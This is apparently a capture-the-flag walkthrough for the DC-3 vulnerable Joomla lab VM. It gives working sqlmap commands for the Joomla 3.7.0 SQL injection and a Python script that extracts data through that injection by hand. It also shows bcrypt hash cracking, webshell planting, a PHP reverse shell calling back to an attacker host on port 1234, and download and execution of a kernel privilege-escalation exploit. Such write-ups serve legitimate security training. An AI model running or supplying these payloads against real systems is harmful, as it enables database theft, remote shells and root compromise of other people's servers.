Target information

DESCRIPTION
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily).

If that's the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

TECHNICAL INFORMATION
DC-3 is a VirtualBox VM built on Ubuntu 32 bit, so there should be no issues running it on most PCs.

Please note: There was an issue reported with DC-3 not working with VMware Workstation. To get around that, I recommend using VirtualBox, however, I have created a separate DC-3 VMware edition for those who can only use VMware.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

This works better with VirtualBox rather than VMware

Changelog
v3.2 - 2020-04-25
v3.0 - 2019-03-26

Information gathering

After deploying the target, sweep the subnet with nmap to find the live hosts: one address is Kali's, the other is the target's. Then scan the target's open ports.

#ping-sweep the subnet for live hosts (-sP is the older spelling of -sn)
nmap -sP 10.0.0.0/24
#scan every TCP port on the target and fingerprint the service versions
nmap -sV -p- 10.0.0.19

[screenshot: QQ截图20210217104206.png]

The description says there is only one entry point, so visit port 80 in a browser.

[screenshot: QQ截图20210217104306.png]

Fingerprint the web stack with whatweb:

whatweb 10.0.0.19

[screenshot: QQ截图20210217111822.png]

whatweb reports the site is running Joomla.

[screenshot: QQ截图20210217112528.png]

Scan the site with joomscan, which reports the Joomla version and other details:

joomscan -u http://10.0.0.19

[screenshot: QQ截图20210217112642.png]

Use searchsploit to look up public exploits for the Joomla version joomscan reported.

[screenshot: QQ截图20210217113009.png]

flag1

searchsploit turns up an SQL injection for this Joomla version: the unauthenticated, error-based injection in the com_fields component's list[fullordering] parameter (Joomla 3.7.0, CVE-2017-8917). Use sqlmap to exploit it and enumerate the databases; -p pins the test to the injectable parameter so sqlmap does not waste time on the others:

[screenshot: QQ截图20210217114148.png]

sqlmap -u "http://10.0.0.19/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

[screenshot: QQ截图20210217121703.png]

With the database name in hand, step down to the users table and dump the name and hashed password columns. This install uses the literal table prefix #__, so the table really is called #__users:

sqlmap -u "http://10.0.0.19/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

[screenshot: QQ截图20210217122650.png]
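sqlmap hides what the injection above actually does. To make the mechanism visible, here is an added example (my code, not part of the original walkthrough or of sqlmap) that extracts a query result by hand through the same list[fullordering] parameter: an updatexml() call whose XPATH argument is the data we want, so MySQL echoes it back inside the error message. Because MySQL truncates that message to 32 characters, the result has to be fetched in 30-character slices with SUBSTR(). The base URL, parameter names and the `#__users` query come from the page; the payload shape, the `~` delimiters and the simulated target are assumptions made so the script runs offline, and against a real host you would pass `requests.get(url).text` as the fetcher.

```python
import re
import urllib.parse

# Target host from the walkthrough; everything else named here is an
# assumption of this example.
BASE_URL = "http://10.0.0.19/index.php"

# MySQL keeps only 32 characters of an updatexml() XPATH error. Two of them
# are the '~' delimiters, so each request can leak at most 30 characters.
CHUNK = 30


def build_payload(query: str, offset: int) -> str:
    """Value for list[fullordering] that forces an XPATH error whose text
    carries CHUNK characters of `query`'s single-row result, starting at
    `offset` (1-based, as SUBSTR counts)."""
    piece = f"(SELECT SUBSTR(({query}),{offset},{CHUNK}))"
    return f"updatexml(0x23,concat(0x7e,{piece},0x7e),0)"


def build_url(query: str, offset: int) -> str:
    """Full request URL for the vulnerable com_fields view."""
    params = {
        "option": "com_fields",
        "view": "fields",
        "layout": "modal",
        "list[fullordering]": build_payload(query, offset),
    }
    return BASE_URL + "?" + urllib.parse.urlencode(params)


# The leaked slice sits between the two '~' markers in the error page.
ERROR_RE = re.compile(r"XPATH syntax error: '~(.*?)~'")


def extract_chunk(response_text: str):
    """Return the leaked slice, '' once the result is exhausted, or None
    when the page showed no XPATH error at all."""
    m = ERROR_RE.search(response_text)
    return m.group(1) if m else None


def dump(query: str, fetch) -> str:
    """Reassemble the full result of `query` one CHUNK at a time.
    `fetch(url)` must return the response body as text."""
    result, offset = "", 1
    while True:
        chunk = extract_chunk(fetch(build_url(query, offset)))
        if not chunk:            # None (no error shown) or '' (past the end)
            break
        result += chunk
        if len(chunk) < CHUNK:   # a short slice means we reached the end
            break
        offset += CHUNK
    return result


def simulate_target(secret: str):
    """Constructed stand-in for the vulnerable page so the example runs
    offline: it reads the SUBSTR offset/length back out of the payload and
    answers with the 32-character-truncated error a real MySQL backend
    would raise."""
    def fetch(url: str) -> str:
        qs = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
        payload = qs["list[fullordering]"][0]
        m = re.search(r"\),(\d+),(\d+)\)\)", payload)
        offset, length = int(m.group(1)), int(m.group(2))
        piece = secret[offset - 1:offset - 1 + length]
        message = ("~" + piece + "~")[:32]      # MySQL's 32-character cap
        return f"<h1>Error</h1><p>XPATH syntax error: '{message}'</p>"
    return fetch


if __name__ == "__main__":
    # Demo against the simulated target; the secret is the bcrypt hash the
    # walkthrough pulled out of #__users with sqlmap.
    known = "$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu"
    print(dump("SELECT password FROM `#__users` LIMIT 1", simulate_target(known)))
```

The 60-character bcrypt hash takes three requests: two full slices and one empty slice that tells the loop to stop. That per-request ceiling is exactly why sqlmap's error-based technique issues so many requests for a single column, and why --level/--risk alone do not speed up a dump.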

Crack the hash with john. The $2y$10$ prefix marks it as bcrypt with cost 10, so expect a slow run; john detects the format on its own, and a wordlist via --wordlist is far more practical here than incremental mode:

#the \$ escapes keep the dollar signs literal inside the unquoted heredoc
cat >>  pass << EOF
\$2y\$10\$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
EOF
john pass

[screenshot: QQ截图20210217123308.png]

Log in to the Joomla administrator backend with the cracked credentials. The backend provides a place to write files to the web root (an upload point), so a PHP webshell can be planted to get code execution on the server.

[screenshot: QQ截图20210217123925.png]

Work out the path the file is served from and drop a one-line webshell (小马) there.

[screenshot: QQ截图20210217125623.png]

Connect to it with AntSword (中国蚁剑).

[screenshot: QQ截图20210217130422.png]

Get a reverse shell. Start a listener on port 1234 on the attacking host (10.0.0.221 here) before requesting the script; the PHP connects back and wires /bin/sh's stdin, stdout and stderr straight to the socket:

#reverse.php
<?php
// attacker host and port; the listener must already be waiting there
$sock = fsockopen("10.0.0.221", 1234);
// hand the socket to the child as stdin (0), stdout (1) and stderr (2)
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
// spawn a shell whose I/O is the socket, then wait for it to exit
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

[screenshot: QQ截图20210217131723.png]

Use searchsploit again, this time for a local privilege escalation matching the target's kernel and distribution.

[screenshot: QQ截图20210217132122.png]

Fetch the exploit archive (EDB-ID 39772, the bpf double-fdput bug, CVE-2016-4557), build it and run it. The wget runs on the target; if the target cannot reach GitHub, download the archive on the attacking machine and transfer it instead. compile.sh needs gcc on the target.

#download the packaged exploit and unpack it
wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
#build with the bundled script (requires gcc on the target), then run it
./compile.sh
./doubleput

[screenshot: QQ截图20210217132434.png]

[screenshot: QQ截图20210217132627.png]

[screenshot: QQ截图20210217132927.png]

[screenshot: QQ截图20210217133528.png]

[screenshot: QQ截图20210217133619.png]